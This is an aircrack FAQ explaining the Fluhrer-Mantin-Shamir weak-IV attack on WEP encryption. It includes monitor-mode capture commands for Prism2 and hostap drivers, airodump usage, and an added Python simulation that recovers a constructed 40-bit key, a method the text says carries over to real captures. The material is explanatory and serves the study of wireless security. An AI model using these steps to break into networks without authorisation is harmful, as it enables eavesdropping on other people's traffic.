

    --[ What is aircrack ?
      
aircrack is an 802.11 WEP key cracker. It implements the classical
Fluhrer-Mantin-Shamir (FMS) attack, along with some optimizations
proposed by David Hulton. Once enough encrypted packets have been
gathered, aircrack can recover the WEP key in a matter of minutes.


    --[ How does aircrack work ?

Each encrypted data packet carries a 3-byte initialization vector
(IV) in the clear; the IV is prepended to the secret key to form the
per-packet RC4 key. The first plaintext byte of a data packet is
almost always 0xAA (the SNAP header), so the first keystream byte is
known for every packet. aircrack looks for so-called "weak IVs": IVs
for which that first keystream byte leaks information about one byte
of the key. A weak IV points to the correct key byte with a
probability of about 5%, so roughly 60 weak IVs are needed to recover
one key byte; the key is recovered one byte at a time. Note that the
set of weak IVs for a given key byte depends on the previous key
bytes, which is why the bytes have to be recovered in order.
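The attack described above, as an added worked example in Python (this is not aircrack's code). It constructs a 40-bit key and a synthetic capture holding, for each key byte a, the classical FMS weak IVs (a+3, 255, x) plus, for a >= 2, a second family (v, 1-v, a-2) that also satisfies the FMS "resolved" condition; only the first ciphertext byte of each packet is kept, since the plaintext there is the SNAP byte 0xAA. The attacker side never looks at the IV pattern: it runs the first a+3 steps of the RC4 key schedule with the IV and the bytes already recovered, keeps the IV only if the resolved condition holds, and derives a candidate for key byte a from the first keystream byte. Because only about 5% of the candidates are right, they are tallied as votes and the search tries the best-voted few per byte (a simplification of the depth/fudge search whose "depth" column appears in the screen output further down this page), verifying the full key against a frame with a known 8-byte LLC/SNAP header rather than the WEP ICV. The key, the capture, the verification frame and all function names are this example's own.

```python
"""FMS weak-IV recovery of a WEP key: an added, self-contained simulation.

Not aircrack's code.  The key, the capture and the verification frame are
all constructed here; nothing comes from a real capture.
"""
from collections import Counter

N = 256
# LLC/SNAP header of an IP frame: the known plaintext at the start of a WEP data packet.
SNAP = bytes([0xAA, 0xAA, 0x03, 0x00, 0x00, 0x00, 0x08, 0x00])


def rc4_keystream(key, n):
    """Full RC4: key schedule (KSA) over the per-packet key, then n keystream bytes (PRGA)."""
    S = list(range(N))
    j = 0
    for i in range(N):
        j = (j + S[i] + key[i % len(key)]) % N
        S[i], S[j] = S[j], S[i]
    out = []
    i = j = 0
    for _ in range(n):
        i = (i + 1) % N
        j = (j + S[i]) % N
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) % N])
    return out


def wep_encrypt(iv, key, data):
    """WEP reduced to its core: RC4(IV || key) XOR data, no ICV.  Also decrypts."""
    ks = rc4_keystream(list(iv) + list(key), len(data))
    return bytes(p ^ k for p, k in zip(data, ks))


def partial_ksa(prefix):
    """Run only the KSA steps whose key bytes the attacker knows: IV + recovered bytes."""
    S = list(range(N))
    j = 0
    for i, k in enumerate(prefix):
        j = (j + S[i] + k) % N
        S[i], S[j] = S[j], S[i]
    return S, j


def fms_candidate(iv, recovered, out0):
    """Candidate for key byte a = len(recovered) from one packet, or None if the IV is not weak.

    out0 is the first keystream byte (first ciphertext byte XOR 0xAA).  The FMS "resolved"
    condition after a+3 KSA steps is S[1] < a+3 and S[1] + S[S[1]] == a+3.  When it holds,
    out0 is (with probability of about 5%) the byte that step a+3 swaps into position a+3,
    which gives K[a+3] = S^-1[out0] - j - S[a+3]  (mod 256).
    """
    a = len(recovered)
    S, j = partial_ksa(list(iv) + list(recovered))
    s1 = S[1]
    if s1 >= a + 3 or (s1 + S[s1]) % N != a + 3:
        return None
    return (S.index(out0) - j - S[a + 3]) % N


def vote(packets, recovered):
    """Tally candidates for the next key byte over the whole capture.
    Returns (votes, number of IVs that passed the resolved test)."""
    votes, weak = Counter(), 0
    for iv, c0 in packets:
        cand = fms_candidate(iv, recovered, c0 ^ 0xAA)
        if cand is not None:
            weak += 1
            votes[cand] += 1
    return votes, weak


def crack(packets, key_len, verify, depth=5):
    """Recover the key byte by byte: try the `depth` best-voted candidates per byte in order
    (a simplified depth / fudge-factor search), backtracking until `verify` accepts a key."""
    def search(recovered):
        if len(recovered) == key_len:
            key = bytes(recovered)
            return key if verify(key) else None
        votes, _ = vote(packets, recovered)
        for b in sorted(range(N), key=lambda b: (-votes[b], b))[:depth]:
            found = search(recovered + [b])
            if found is not None:
                return found
        return None
    return search([])


def weak_iv_capture(key):
    """Constructed capture: for each key byte a, the classical FMS IVs (a+3, 255, x) and, for
    a >= 2, the family (v, 1-v, a-2), which also satisfies the resolved condition.  Each packet
    is kept as (iv, first ciphertext byte)."""
    packets = []
    for a in range(len(key)):
        ivs = [(a + 3, 255, x) for x in range(N)]
        if a >= 2:
            ivs += [(v, (1 - v) % N, a - 2) for v in range(N)]
        for iv in ivs:
            packets.append((iv, wep_encrypt(iv, key, SNAP[:1])[0]))
    return packets


KEY = bytes([0x1F, 0x8A, 0x3C, 0xD2, 0x75])   # constructed 40-bit key: the secret to recover
CAPTURE = weak_iv_capture(KEY)
VERIFY_IV = (0x10, 0x20, 0x30)                # one ordinary packet, used only to confirm a key
VERIFY_FRAME = wep_encrypt(VERIFY_IV, KEY, SNAP)


def known_plaintext_check(candidate):
    """Stand-in for the ICV check: the key must decrypt the frame back to its SNAP header."""
    return wep_encrypt(VERIFY_IV, candidate, VERIFY_FRAME) == SNAP


def recover_key():
    return crack(CAPTURE, len(KEY), known_plaintext_check)


if __name__ == "__main__":
    votes, weak = vote(CAPTURE, [])
    print("Byte 0: weaks = %d, best = %s" % (weak, votes.most_common(3)))
    print("KEY FOUND! [%s]" % ":".join("%02X" % b for b in recover_key()))
```

Running the block prints the number of IVs that passed the resolved test for byte 0 (254 of the 256 classical IVs; the other families in the capture are rejected for that byte) together with the three best-voted candidates, then the recovered key. The same vote/search core would work on a real IV file; what a real tool must add is speed, since running the resolved test over millions of IVs for every key byte is where the time goes.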


    --[ How many packets are needed for recovering a WEP key ?

Regardless of the key size (5 or 13 bytes), you'll need about two
million unique IVs to be sure of finding the correct key. The table
in the next section shows why: key byte 0 has 768 weak IVs among the
2^24 possible IVs, so two million unique IVs contain on average
2,000,000 * 768 / 16,777,216, i.e. about 90 weak IVs for that byte,
comfortably above the 60 or so that are needed. If you're lucky or
very patient, one million unique IVs (about 45 weak IVs for byte 0)
might be enough.


    --[ Is aircrack different from AirSnort ?

It is somewhat more efficient: AirSnort only knows about 9000 weak
IVs, whereas aircrack considers all possibly weak IVs. Their number
per key byte, out of the 2^24 possible IVs, is distributed as
follows:

    keybyte     # of weak IVs

          0               768
          1            131328
          2            197376
          3            197120
          4            328703
          5            328192
          6            459520
          7            459264
          8            590592
          9            590336
         10            721664
         11            721408
         12            852736


    --[ How do I capture packets ?

First of all, you have to put the wireless interface in monitoring
mode; for example, if you have a Prism2 card and use linux-wlan-ng:

wlanctl-ng wlan0 lnxreq_ifstate ifstate=enable
wlanctl-ng wlan0 lnxreq_wlansniff enable=true channel=<AP channel>
ifconfig wlan0 up

Alternatively, if you use the more stable & friendly hostap driver:

ifconfig wlan0 up
iwconfig wlan0 mode Monitor
iwconfig wlan0 channel <AP channel>
iwconfig wlan0 sensitivity 3
iwpriv wlan0 monitor_type 0

Then run a capture program such as tcpdump or airodump:

 tcpdump -i wlan0 -s 0 -w pcap_out
airodump -e wlan0 pcap_out

Use airodump rather than tcpdump: it has more useful filtering
options (such as -b or -e) and can handle capture files larger than
2 GB.


    --[ How can I run aircrack in the background ?

For this purpose, you may use the "screen" program.

    . Starting a new session: screen -t title
    . Detaching a session: Ctrl-a <release> d
    . Reattaching a session:  screen -r


    --[ How do I know when aircrack finds the key ?

Your screen will look like:

    ---------------------------------------------------------------

                                 aircrack 1.0

   * Got 993675 unique IVs
   * Elapsed time [00:00:01]
   * Tried 18 keys at 18 k/s
   * Current [A4:4B:79:2A:81:C0:06:92:D4:B4:1F:FA:81]

   Byte  0: weaks =   32! depth =  0/ 20, best = A4(  2) 06(  1) 09(  1) 
   Byte  1: weaks =   28! depth =  1/ 10, best = 4B(  2) C3(  2) 02(  1) 
   Byte  2: weaks =   86  depth =  1/  3, best = 79(  3) 15(  2) 1D(  2) 
   Byte  3: weaks =   91  depth =  0/  3, best = 2A(  7) 23(  4) 38(  3) 
   Byte  4: weaks =  150  depth =  0/  1, best = 81(  6) 8A(  5) 16(  3) 
   Byte  5: weaks =  122  depth =  0/  2, best = C0(  7) 54(  3) 17(  2) 
   Byte  6: weaks =  192  depth =  0/  1, best = 06( 12) 15(  6) 3B(  4) 
   Byte  7: weaks =  317  depth =  0/  1, best = 92( 24) 0D(  5) 3F(  5) 
   Byte  8: weaks =  337  depth =  0/  1, best = D4( 24) B0(  5) F5(  5) 
   Byte  9: weaks =  302  depth =  0/  1, best = B4( 19) A4(  5) AC(  5) 
   Byte 10: weaks =  305  depth =  0/  1, best = 1F( 22) C1(  5) 11(  4) 
   Byte 11: weaks =  400  depth =  0/  1, best = FA( 19) 35(  7) 05(  6) 
   Byte 12: weaks =  319  depth =  0/  1, best = 81(  7) 50(  6) B1(  5) 

               KEY FOUND! [A4:4B:79:2A:81:C0:06:92:D4:B4:1F:FA:81]

    ---------------------------------------------------------------


    --[ I've got x million packets but aircrack doesn't find the key !

If possible, gather more encrypted data packets; otherwise increase
the fudge factor (e.g. -f 8), which makes aircrack try more of the
less-voted candidates for each key byte before giving up. Also try
the other key size: a 40-bit (5-byte) key will not be found when a
104-bit (13-byte) key is assumed, and vice versa.


    --[ I've got x million packets but no weak IVs at all !

The wifi hardware (or driver) that generated the IVs skips the weak
ones, a countermeasure some vendors implement against FMS. Without
weak IVs the attack has nothing to work with, so you're just plain
out of luck with that traffic.


